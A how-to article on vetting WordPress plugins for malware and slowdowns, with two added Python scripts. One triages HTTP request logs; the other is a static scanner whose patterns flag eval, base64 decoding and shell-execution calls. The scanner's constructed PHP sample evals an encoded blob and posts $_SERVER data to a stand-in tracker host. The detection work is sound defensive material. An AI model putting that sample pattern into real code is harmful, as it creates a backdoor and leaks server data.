Plugins can bring many advantages to your WordPress website. However, you should consider carefully before using one because it may contain viruses and malicious code. It may also affect your website's loading speed and performance. To check if a plugin has an issue, especially a newly launched plugin, you can use various tools and follow the steps below.

But first, don't rush to install the plugin on your website. Use another site to test the plugin's safety and performance.

Check the Safety of a WordPress Plugin

Using Online Tools

WPSec is a powerful tool to scan your WordPress site to see if it is protected from threats.

First, go to the WPSec site, then enter the website address and click Start Scan.

After the scan finishes, the tool shows the results so you can see whether your page is safe and how many dangerous elements there are. For example, my site is quite secure. It means that there is no issue with the plugins used on my site.

To regularly receive notifications about your website security warnings, you can sign up for an account (it’s free) on WPSec.

By following the steps above, you can regularly check whether your website has any issues and whether the plugins you use affect it.

Using Another Plugin

Using a plugin to test another plugin sounds weird, but it really makes sense.

You should choose some credible plugins such as Wordfence Security and Log HTTP Requests.

Wordfence Security is one of the most famous plugins for detecting and eradicating malicious code on WordPress websites. You just need to install and activate Wordfence Security for free from the Dashboard. After activating the plugin, a new Wordfence menu appears. Go to it and you will see the Wordfence Security interface. Then, click Start New Scan.

Wait a short time for the scan to finish. The plugin will then list the issues found on your site, including ones from plugins. Click on the magnifier icon to see the details.

For example, the Meta Box plugin has no malware problems; it only needs to be updated to the latest version. If there are other problems, Wordfence Security will notify you. After that, you can decide whether to use the plugin or not.

Next, if you use the Log HTTP Requests plugin, you will see what is being sent from your website, including all the HTTP requests, AJAX requests, as well as your website data.

Install Log HTTP Requests from the dashboard

Once installed, the plugin will log the data of requests. You can go to Tools > Log HTTP Request to see them:

From these records, you will know which kind of data is sent or received by the plugin. Spend time checking them to make sure that the plugin does not leak your important data or fetch something weird.
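One way to triage such records offline, as an added example that is not part of the original article or of the Log HTTP Requests plugin. The record layout, the host allowlist, and the list of sensitive field names are assumptions, and the records are constructed.

```python
import json
from urllib.parse import urlsplit, parse_qsl

# Constructed records; the "url"/"body" layout is an assumption for this
# example, not the Log HTTP Requests plugin's storage or export format.
RECORDS = [
    {"url": "https://api.wordpress.org/plugins/update-check/1.1/", "body": "plugins=%7B%7D"},
    {"url": "http://stats.tracker.example/collect",
     "body": '{"admin_email": "owner@site.example", "siteurl": "https://site.example"}'},
    {"url": "https://cdn.vendor.example/license?key=abc", "body": ""},
]

# Assumed policy: field names we never expect a plugin to send off-site,
# and the only hosts this test site is expected to contact.
SENSITIVE = {"admin_email", "user_email", "user_pass", "password", "auth_key", "siteurl"}
EXPECTED_HOSTS = {"api.wordpress.org"}


def body_fields(body):
    """Return the field names of a JSON-object or form-encoded request body."""
    try:
        data = json.loads(body)
        if isinstance(data, dict):
            return set(data)
    except ValueError:
        pass  # not JSON, fall back to form decoding
    return {name for name, _ in parse_qsl(body)}


def review(records, expected_hosts=EXPECTED_HOSTS):
    """Return (host, reasons) for every record that deserves a closer look."""
    report = []
    for rec in records:
        parts = urlsplit(rec["url"])
        fields = body_fields(rec.get("body", "")) | {n for n, _ in parse_qsl(parts.query)}
        reasons = []
        if parts.hostname not in expected_hosts:
            reasons.append("unexpected-host")
        if parts.scheme != "https":
            reasons.append("cleartext")
        leaked = sorted(fields & SENSITIVE)
        if leaked:
            reasons.append("sends:" + ",".join(leaked))
        if reasons:
            report.append((parts.hostname, reasons))
    return report


if __name__ == "__main__":
    for host, reasons in review(RECORDS):
        print(host, reasons)
```
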

Detecting Unusual Code in the Plugin

Finally, you should check if there is any unusual code in the plugin or if it connects to other sites.

For example, if your plugin contains code like this, you should reconsider using it:

[Image: an example of weird code in a plugin]
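A small static check for the two things mentioned above, unusual code and connections to other sites, as an added example that is not from the original article. The rule list, the allowed hosts, and the sample plugin file are assumptions constructed for illustration; hits are leads for manual review, not verdicts.

```python
import re
import tempfile
from pathlib import Path

# Heuristic rules chosen for this example; not an exhaustive or official list.
RULES = {
    "dynamic-eval": re.compile(r"\b(?:eval|create_function)\s*\(", re.I),
    "decode-chain": re.compile(r"\b(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
    "shell-exec": re.compile(r"\b(?:system|exec|shell_exec|passthru|proc_open)\s*\(", re.I),
}
URL_RX = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)

# Constructed sample, not taken from any real plugin.
SAMPLE_PHP = """<?php
// Demo plugin body (constructed).
$blob = get_option( 'demo_blob' );
eval( base64_decode( $blob ) );
wp_remote_post( 'http://stats.tracker.example/collect', array( 'body' => $_SERVER ) );
wp_remote_get( 'https://api.wordpress.org/plugins/info/1.0/' );
"""


def scan_plugin(plugin_dir, allowed_hosts=("wordpress.org", "w.org")):
    """Return (file, line, finding) tuples for every PHP file under plugin_dir."""
    findings = []
    for path in sorted(Path(plugin_dir).rglob("*.php")):
        text = path.read_text(encoding="utf-8", errors="replace")
        for lineno, line in enumerate(text.splitlines(), 1):
            for rule, rx in RULES.items():
                if rx.search(line):
                    findings.append((path.name, lineno, rule))
            # Report every hard-coded host that is not on the allowlist.
            for host in URL_RX.findall(line):
                host = host.lower().rstrip(".")
                if not any(host == a or host.endswith("." + a) for a in allowed_hosts):
                    findings.append((path.name, lineno, "external-host:" + host))
    return findings


def demo():
    """Write the constructed sample to a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        (Path(tmp) / "demo-plugin.php").write_text(SAMPLE_PHP, encoding="utf-8")
        return scan_plugin(tmp)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```
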

Using RIPS Scanner

You can use the RIPS Scanner to check if your plugin is nulled or contains malicious code. RIPS scans the plugin's PHP files and then reports the issues it finds. Here are the steps to use RIPS for scanning:

  1. Download the tool here;
  2. Extract the tool to the web root directory;
  3. Go to domain/rips to scan.

Check If the Plugin Slows Down the Site

GTmetrix and Pingdom are the go-to tools for checking if a plugin is slowing down your site. But note that these tools do not list which plugins are causing your website's performance issues. So, you should also look at the plugin's CSS/JS files to check whether the issues come from the plugin or not.

Using GTmetrix

Go to GTmetrix and enter your website’s URL, then click Test Your Site and wait for a while for the scanning.

When the scan finishes, scroll down to the Top Issues section. You will see the issues ranked as High (which affects page speed the most), Med-Low (which affects page speed moderately), and Low (which affects the page speed just a little bit). Check whether any of them come from the plugin that you are using. To learn more about an issue, you can click on the arrow next to it.

Using Pingdom

Enter your website domain on Pingdom as well. Wait, then scroll down to the Improve Page Performance section, where the tool evaluates the site speed and gives scores from 0 to 100. Then, click on the arrow icon next to the sections with low scores to find out where the problem is.

Check for Unused CSS/JS Files

In addition to using the two above tools, you can take advantage of the browser's console to view the plugin's resources (CSS/JS files).

You can enable the Coverage tool in Chrome DevTools (select the three-dot button > More tools > Coverage) and see if there are unused CSS/JS files.

If there are any unused files, you should remove them. I have a tutorial on deleting unused CSS/JS files here; follow it to learn how.

Other Methods

If you hire a developer to create a plugin for you and the plugin has not been uploaded to wordpress.org, you can try to upload it. The team there will review the plugin carefully. It is just a small trick, but it may take a lot of time.

Alternatively, you can try joining some communities to ask someone, even experienced developers, to test it out.

The Last Words

As you can see, there are many ways to check if a plugin affects the speed or security of your WordPress website. No matter which tools you use, make the most of them to check the plugin carefully.

In particular, choosing plugins developed by reliable and credible companies or developers is a good approach. Remember to update the plugin regularly as well, so that you always run its latest and most secure version.
